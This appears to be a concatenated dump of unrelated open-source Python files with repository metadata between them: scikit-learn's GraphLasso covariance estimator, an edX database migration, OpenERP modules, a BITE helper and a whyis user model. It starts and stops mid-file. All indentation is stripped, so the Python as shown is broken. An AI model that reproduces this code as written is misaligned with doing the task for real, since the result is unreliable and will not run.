client.module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
pkruskal/scikit-learn
|
sklearn/covariance/graph_lasso_.py
|
127
|
25626
|
"""GraphLasso: sparse inverse covariance estimation with an l1-penalized
estimator.
"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
# Copyright: INRIA
import warnings
import operator
import sys
import time
import numpy as np
from scipy import linalg
from .empirical_covariance_ import (empirical_covariance, EmpiricalCovariance,
log_likelihood)
from ..utils import ConvergenceWarning
from ..utils.extmath import pinvh
from ..utils.validation import check_random_state, check_array
from ..linear_model import lars_path
from ..linear_model import cd_fast
from ..cross_validation import check_cv, cross_val_score
from ..externals.joblib import Parallel, delayed
import collections
# Helper functions to compute the objective and dual objective functions
# of the l1-penalized estimator
def _objective(mle, precision_, alpha):
"""Evaluation of the graph-lasso objective function
the objective function is made of a shifted scaled version of the
normalized log-likelihood (i.e. its empirical mean over the samples) and a
penalisation term to promote sparsity
"""
p = precision_.shape[0]
cost = - 2. * log_likelihood(mle, precision_) + p * np.log(2 * np.pi)
cost += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return cost
def _dual_gap(emp_cov, precision_, alpha):
"""Expression of the dual gap convergence criterion
The specific definition is given in Duchi "Projected Subgradient Methods
for Learning Sparse Gaussians".
"""
gap = np.sum(emp_cov * precision_)
gap -= precision_.shape[0]
gap += alpha * (np.abs(precision_).sum()
- np.abs(np.diag(precision_)).sum())
return gap
def alpha_max(emp_cov):
"""Find the maximum alpha for which there are some non-zeros off-diagonal.
Parameters
----------
emp_cov : 2D array, (n_features, n_features)
The sample covariance matrix
Notes
-----
This results from the bound for the all the Lasso that are solved
in GraphLasso: each time, the row of cov corresponds to Xy. As the
bound for alpha is given by `max(abs(Xy))`, the result follows.
"""
A = np.copy(emp_cov)
A.flat[::A.shape[0] + 1] = 0
return np.max(np.abs(A))
# The g-lasso algorithm
def graph_lasso(emp_cov, alpha, cov_init=None, mode='cd', tol=1e-4,
enet_tol=1e-4, max_iter=100, verbose=False,
return_costs=False, eps=np.finfo(np.float64).eps,
return_n_iter=False):
"""l1-penalized covariance estimator
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
emp_cov : 2D ndarray, shape (n_features, n_features)
Empirical covariance from which to compute the covariance estimate.
alpha : positive float
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
cov_init : 2D array (n_features, n_features), optional
The initial guess for the covariance.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : boolean, optional
If verbose is True, the objective function and dual gap are
printed at each iteration.
return_costs : boolean, optional
If return_costs is True, the objective function and dual gap
at each iteration are returned.
eps : float, optional
The machine-precision regularization in the computation of the
Cholesky diagonal factors. Increase this for very ill-conditioned
systems.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
covariance : 2D ndarray, shape (n_features, n_features)
The estimated covariance matrix.
precision : 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrix.
costs : list of (objective, dual_gap) pairs
The list of values of the objective function and the dual gap at
each iteration. Returned only if return_costs is True.
n_iter : int
Number of iterations. Returned only if `return_n_iter` is set to True.
See Also
--------
GraphLasso, GraphLassoCV
Notes
-----
The algorithm employed to solve this problem is the GLasso algorithm,
from the Friedman 2008 Biostatistics paper. It is the same algorithm
as in the R `glasso` package.
One possible difference with the `glasso` R package is that the
diagonal coefficients are not penalized.
"""
_, n_features = emp_cov.shape
if alpha == 0:
if return_costs:
precision_ = linalg.inv(emp_cov)
cost = - 2. * log_likelihood(emp_cov, precision_)
cost += n_features * np.log(2 * np.pi)
d_gap = np.sum(emp_cov * precision_) - n_features
if return_n_iter:
return emp_cov, precision_, (cost, d_gap), 0
else:
return emp_cov, precision_, (cost, d_gap)
else:
if return_n_iter:
return emp_cov, linalg.inv(emp_cov), 0
else:
return emp_cov, linalg.inv(emp_cov)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init.copy()
# As a trivial regularization (Tikhonov like), we scale down the
# off-diagonal coefficients of our starting point: This is needed, as
# in the cross-validation the cov_init can easily be
# ill-conditioned, and the CV loop blows. Beside, this takes
# conservative stand-point on the initial conditions, and it tends to
# make the convergence go faster.
covariance_ *= 0.95
diagonal = emp_cov.flat[::n_features + 1]
covariance_.flat[::n_features + 1] = diagonal
precision_ = pinvh(covariance_)
indices = np.arange(n_features)
costs = list()
# The different l1 regression solver have different numerical errors
if mode == 'cd':
errors = dict(over='raise', invalid='ignore')
else:
errors = dict(invalid='raise')
try:
# be robust to the max_iter=0 edge case, see:
# https://github.com/scikit-learn/scikit-learn/issues/4134
d_gap = np.inf
for i in range(max_iter):
for idx in range(n_features):
sub_covariance = covariance_[indices != idx].T[indices != idx]
row = emp_cov[idx, indices != idx]
with np.errstate(**errors):
if mode == 'cd':
# Use coordinate descent
coefs = -(precision_[indices != idx, idx]
/ (precision_[idx, idx] + 1000 * eps))
coefs, _, _, _ = cd_fast.enet_coordinate_descent_gram(
coefs, alpha, 0, sub_covariance, row, row,
max_iter, enet_tol, check_random_state(None), False)
else:
# Use LARS
_, _, coefs = lars_path(
sub_covariance, row, Xy=row, Gram=sub_covariance,
alpha_min=alpha / (n_features - 1), copy_Gram=True,
method='lars', return_path=False)
# Update the precision matrix
precision_[idx, idx] = (
1. / (covariance_[idx, idx]
- np.dot(covariance_[indices != idx, idx], coefs)))
precision_[indices != idx, idx] = (- precision_[idx, idx]
* coefs)
precision_[idx, indices != idx] = (- precision_[idx, idx]
* coefs)
coefs = np.dot(sub_covariance, coefs)
covariance_[idx, indices != idx] = coefs
covariance_[indices != idx, idx] = coefs
d_gap = _dual_gap(emp_cov, precision_, alpha)
cost = _objective(emp_cov, precision_, alpha)
if verbose:
print(
'[graph_lasso] Iteration % 3i, cost % 3.2e, dual gap %.3e'
% (i, cost, d_gap))
if return_costs:
costs.append((cost, d_gap))
if np.abs(d_gap) < tol:
break
if not np.isfinite(cost) and i > 0:
raise FloatingPointError('Non SPD result: the system is '
'too ill-conditioned for this solver')
else:
warnings.warn('graph_lasso: did not converge after %i iteration:'
' dual gap: %.3e' % (max_iter, d_gap),
ConvergenceWarning)
except FloatingPointError as e:
e.args = (e.args[0]
+ '. The system is too ill-conditioned for this solver',)
raise e
if return_costs:
if return_n_iter:
return covariance_, precision_, costs, i + 1
else:
return covariance_, precision_, costs
else:
if return_n_iter:
return covariance_, precision_, i + 1
else:
return covariance_, precision_
class GraphLasso(EmpiricalCovariance):
"""Sparse inverse covariance estimation with an l1-penalized estimator.
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alpha : positive float, default 0.01
The regularization parameter: the higher alpha, the more
regularization, the sparser the inverse covariance.
mode : {'cd', 'lars'}, default 'cd'
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, default 1e-4
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, default 100
The maximum number of iterations.
verbose : boolean, default False
If verbose is True, the objective function and dual gap are
plotted at each iteration.
assume_centered : boolean, default False
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : array-like, shape (n_features, n_features)
Estimated covariance matrix
precision_ : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
n_iter_ : int
Number of iterations run.
See Also
--------
graph_lasso, GraphLassoCV
"""
def __init__(self, alpha=.01, mode='cd', tol=1e-4, enet_tol=1e-4,
max_iter=100, verbose=False, assume_centered=False):
self.alpha = alpha
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=self.alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=self.verbose, return_n_iter=True)
return self
# Cross-validation with GraphLasso
def graph_lasso_path(X, alphas, cov_init=None, X_test=None, mode='cd',
tol=1e-4, enet_tol=1e-4, max_iter=100, verbose=False):
"""l1-penalized covariance estimator along a path of decreasing alphas
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
X : 2D ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate.
alphas : list of positive floats
The list of regularization parameters, decreasing order.
X_test : 2D array, shape (n_test_samples, n_features), optional
Optional test matrix to measure generalisation error.
mode : {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where p > n. Elsewhere prefer cd
which is more numerically stable.
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter : integer, optional
The maximum number of iterations.
verbose : integer, optional
The higher the verbosity flag, the more information is printed
during the fitting.
Returns
-------
covariances_ : List of 2D ndarray, shape (n_features, n_features)
The estimated covariance matrices.
precisions_ : List of 2D ndarray, shape (n_features, n_features)
The estimated (sparse) precision matrices.
scores_ : List of float
The generalisation error (log-likelihood) on the test data.
Returned only if test data is passed.
"""
inner_verbose = max(0, verbose - 1)
emp_cov = empirical_covariance(X)
if cov_init is None:
covariance_ = emp_cov.copy()
else:
covariance_ = cov_init
covariances_ = list()
precisions_ = list()
scores_ = list()
if X_test is not None:
test_emp_cov = empirical_covariance(X_test)
for alpha in alphas:
try:
# Capture the errors, and move on
covariance_, precision_ = graph_lasso(
emp_cov, alpha=alpha, cov_init=covariance_, mode=mode, tol=tol,
enet_tol=enet_tol, max_iter=max_iter, verbose=inner_verbose)
covariances_.append(covariance_)
precisions_.append(precision_)
if X_test is not None:
this_score = log_likelihood(test_emp_cov, precision_)
except FloatingPointError:
this_score = -np.inf
covariances_.append(np.nan)
precisions_.append(np.nan)
if X_test is not None:
if not np.isfinite(this_score):
this_score = -np.inf
scores_.append(this_score)
if verbose == 1:
sys.stderr.write('.')
elif verbose > 1:
if X_test is not None:
print('[graph_lasso_path] alpha: %.2e, score: %.2e'
% (alpha, this_score))
else:
print('[graph_lasso_path] alpha: %.2e' % alpha)
if X_test is not None:
return covariances_, precisions_, scores_
return covariances_, precisions_
class GraphLassoCV(GraphLasso):
"""Sparse inverse covariance w/ cross-validated choice of the l1 penalty
Read more in the :ref:`User Guide <sparse_inverse_covariance>`.
Parameters
----------
alphas : integer, or list positive float, optional
If an integer is given, it fixes the number of points on the
grids of alpha to be used. If a list is given, it gives the
grid to be used. See the notes in the class docstring for
more details.
n_refinements: strictly positive integer
The number of times the grid is refined. Not used if explicit
values of alphas are passed.
cv : cross-validation generator, optional
see sklearn.cross_validation module. If None is passed, defaults to
a 3-fold strategy
tol: positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped.
enet_tol : positive float, optional
The tolerance for the elastic net solver used to calculate the descent
direction. This parameter controls the accuracy of the search direction
for a given column update, not of the overall parameter estimate. Only
used for mode='cd'.
max_iter: integer, optional
Maximum number of iterations.
mode: {'cd', 'lars'}
The Lasso solver to use: coordinate descent or LARS. Use LARS for
very sparse underlying graphs, where number of features is greater
than number of samples. Elsewhere prefer cd which is more numerically
stable.
n_jobs: int, optional
number of jobs to run in parallel (default 1).
verbose: boolean, optional
If verbose is True, the objective function and duality gap are
printed at each iteration.
assume_centered : Boolean
If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False, data are centered before computation.
Attributes
----------
covariance_ : numpy.ndarray, shape (n_features, n_features)
Estimated covariance matrix.
precision_ : numpy.ndarray, shape (n_features, n_features)
Estimated precision matrix (inverse covariance).
alpha_ : float
Penalization parameter selected.
cv_alphas_ : list of float
All penalization parameters explored.
`grid_scores`: 2D numpy.ndarray (n_alphas, n_folds)
Log-likelihood score on left-out data across folds.
n_iter_ : int
Number of iterations run for the optimal alpha.
See Also
--------
graph_lasso, GraphLasso
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
One of the challenges which is faced here is that the solvers can
fail to converge to a well-conditioned estimate. The corresponding
values of alpha then come out as missing values, but the optimum may
be close to these missing values.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None, tol=1e-4,
enet_tol=1e-4, max_iter=100, mode='cd', n_jobs=1,
verbose=False, assume_centered=False):
self.alphas = alphas
self.n_refinements = n_refinements
self.mode = mode
self.tol = tol
self.enet_tol = enet_tol
self.max_iter = max_iter
self.verbose = verbose
self.cv = cv
self.n_jobs = n_jobs
self.assume_centered = assume_centered
# The base class needs this for the score method
self.store_precision = True
def fit(self, X, y=None):
"""Fits the GraphLasso covariance model to X.
Parameters
----------
X : ndarray, shape (n_samples, n_features)
Data from which to compute the covariance estimate
"""
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
emp_cov = empirical_covariance(
X, assume_centered=self.assume_centered)
cv = check_cv(self.cv, X, y, classifier=False)
# List of (alpha, scores, covs)
path = list()
n_alphas = self.alphas
inner_verbose = max(0, self.verbose - 1)
if isinstance(n_alphas, collections.Sequence):
alphas = self.alphas
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1 = alpha_max(emp_cov)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
t0 = time.time()
for i in range(n_refinements):
with warnings.catch_warnings():
# No need to see the convergence warnings on this grid:
# they will always be points that will not converge
# during the cross-validation
warnings.simplefilter('ignore', ConvergenceWarning)
# Compute the cross-validated loss on the current grid
# NOTE: Warm-restarting graph_lasso_path has been tried, and
# this did not allow to gain anything (same execution time with
# or without).
this_path = Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(
delayed(graph_lasso_path)(
X[train], alphas=alphas,
X_test=X[test], mode=self.mode,
tol=self.tol, enet_tol=self.enet_tol,
max_iter=int(.1 * self.max_iter),
verbose=inner_verbose)
for train, test in cv)
# Little danse to transform the list in what we need
covs, _, scores = zip(*this_path)
covs = zip(*covs)
scores = zip(*scores)
path.extend(zip(alphas, scores, covs))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
# Find the maximum (avoid using built in 'max' function to
# have a fully-reproducible selection of the smallest alpha
# in case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, scores, _) in enumerate(path):
this_score = np.mean(scores)
if this_score >= .1 / np.finfo(np.float64).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
if not isinstance(n_alphas, collections.Sequence):
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
n_alphas + 2)
alphas = alphas[1:-1]
if self.verbose and n_refinements > 1:
print('[GraphLassoCV] Done refinement % 2i out of %i: % 3is'
% (i + 1, n_refinements, time.time() - t0))
path = list(zip(*path))
grid_scores = list(path[1])
alphas = list(path[0])
# Finally, compute the score with alpha = 0
alphas.append(0)
grid_scores.append(cross_val_score(EmpiricalCovariance(), X,
cv=cv, n_jobs=self.n_jobs,
verbose=inner_verbose))
self.grid_scores = np.array(grid_scores)
best_alpha = alphas[best_index]
self.alpha_ = best_alpha
self.cv_alphas_ = alphas
# Finally fit the model with the selected alpha
self.covariance_, self.precision_, self.n_iter_ = graph_lasso(
emp_cov, alpha=best_alpha, mode=self.mode, tol=self.tol,
enet_tol=self.enet_tol, max_iter=self.max_iter,
verbose=inner_verbose, return_n_iter=True)
return self
|
bsd-3-clause
|
fighterlyt/bite-project
|
server/handlers/common_util.py
|
17
|
2084
|
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The common lib utils."""
__author__ = 'phu@google.com (Po Hu)'
from models import bite_event
from utils import bite_constants
def GetEventData(event):
"""Gets the events data."""
event_id = str(bite_event.BiteEvent.host.get_value_for_datastore(event))
event_type = event.event_type
name = event.name or ''
labels = event.labels or []
if event_type == 'project':
icon = '/images/spec/performance.png'
elif event_type == 'suite' or event_type == 'set':
event_type = 'set'
icon = '/images/artifacts/testautomated.png'
elif event_type == 'run':
icon = '/images/sample/run01-pie.png'
elif event_type == 'schedule':
icon = '/images/spec/security.png'
elif event_type == 'run_template':
icon = '/images/sample/run01-pie.png'
event_type = 'runTemplate'
action = ''
if event.action:
action = bite_constants.EVENT_ACTION_TO_READABLE[event.action]
action = ' '.join([event_type, action])
email = ''
if event.created_by:
email = event.created_by.email()
return {'id': event_id,
'extraId': str(event.key()),
'type': event_type,
'title': name,
'labels': labels,
'icon': icon,
'actions': [
{'title': 'View details',
'operation': 'viewDetails'}],
'props': [{'label': 'action', 'value': action},
{'label': 'by', 'value': email},
{'label': 'around', 'value': str(event.created_time)}]}
|
apache-2.0
|
edxnercel/edx-platform
|
lms/djangoapps/certificates/migrations/0019_auto__add_certificatehtmlviewconfiguration.py
|
101
|
7978
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CertificateHtmlViewConfiguration'
db.create_table('certificates_certificatehtmlviewconfiguration', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('change_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('changed_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, on_delete=models.PROTECT)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=False)),
('configuration', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('certificates', ['CertificateHtmlViewConfiguration'])
def backwards(self, orm):
# Deleting model 'CertificateHtmlViewConfiguration'
db.delete_table('certificates_certificatehtmlviewconfiguration')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.certificategenerationconfiguration': {
'Meta': {'object_name': 'CertificateGenerationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatehtmlviewconfiguration': {
'Meta': {'object_name': 'CertificateHtmlViewConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'configuration': ('django.db.models.fields.TextField', [], {}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificatewhitelist': {
'Meta': {'object_name': 'CertificateWhitelist'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'whitelist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'error_reason': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '512', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '32'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
agpl-3.0
|
kirca/OpenUpgrade
|
addons/hr_timesheet_invoice/report/__init__.py
|
433
|
1136
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_analytic_profit
import report_analytic
import hr_timesheet_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
tetherless-world/graphene
|
whyis/datastore/user.py
|
2
|
1067
|
from flask_security import UserMixin
from flask_security.utils import verify_and_update_password
from whyis.namespace import dc, auth, foaf, prov
from .single import single
from .multiple import multiple
from .mapped_resource import MappedResource
class User(MappedResource, UserMixin):
rdf_type = prov.Agent
key = 'id'
id = single(dc.identifier)
active = single(auth.active)
confirmed_at = single(auth.confirmed)
email = single(auth.email)
current_login_at = single(auth.hadCurrentLogin)
current_login_ip = single( auth.hadCurrentLoginIP)
last_login_at = single( auth.hadLastLogin)
last_login_ip = single( auth.hadLastLoginIP)
login_count = single( auth.hadLoginCount)
roles = multiple( auth.hasRole)
password = single( auth.passwd)
familyName = single(foaf.familyName)
givenName = single(foaf.givenName)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def verify_and_update_password(self, password):
return verify_and_update_password(password, self)
|
apache-2.0
|
ksrajkumar/openerp-6.1
|
openerp/addons/idea/wizard/idea_post_vote.py
|
9
|
6466
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from tools.translate import _
class idea_post_vote(osv.osv_memory):
""" Post Vote For Idea """
_name = "idea.post.vote"
_description = "Post vote"
_columns = {
'vote': fields.selection([('-1', 'Not Voted'),
('0', 'Very Bad'),
('25', 'Bad'),
('50', 'Normal'),
('75', 'Good'),
('100', 'Very Good') ],
'Post Vote', required=True),
'note': fields.text('Description'),
}
def get_default(self, cr, uid, context=None):
"""
This function checks for precondition before wizard executes
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
"""
if context is None:
context = {}
idea_obj = self.pool.get('idea.idea')
if context.get('active_id'):
idea = idea_obj.browse(cr, uid, context.get('active_id'), context=context)
return idea.my_vote
else:
return 75
_defaults = {
'vote': get_default,
}
def view_init(self, cr, uid, fields, context=None):
"""
This function checks for precondition before wizard executes
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
"""
idea_obj = self.pool.get('idea.idea')
vote_obj = self.pool.get('idea.vote')
ctx_key = 'idea_ids' if context.get('idea_ids') is not None else 'active_ids'
for idea in idea_obj.browse(cr, uid, context.get(ctx_key, []), context=context):
for idea_id in context.get(ctx_key):
vote_ids = vote_obj.search(cr, uid, [('user_id', '=', uid), ('idea_id', '=', idea_id)])
vote_obj_id = vote_obj.browse(cr, uid, vote_ids)
count = 0
for vote in vote_obj_id:
count += 1
user_limit = idea.vote_limit
if count >= user_limit:
raise osv.except_osv(_('Warning !'),_("You can not give Vote for this idea more than %s times") % (user_limit))
if idea.state != 'open':
raise osv.except_osv(_('Warning !'), _('Idea must be in \
\'Open\' state before vote for that idea.'))
return False
def do_vote(self, cr, uid, ids, context=None):
"""
Create idea vote.
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of Idea Post vote’s IDs.
@return: Dictionary {}
"""
ctx_key = 'idea_ids' if context.get('idea_ids') is not None else 'active_ids'
idea_id = context[ctx_key][0]
vote_pool = self.pool.get('idea.vote')
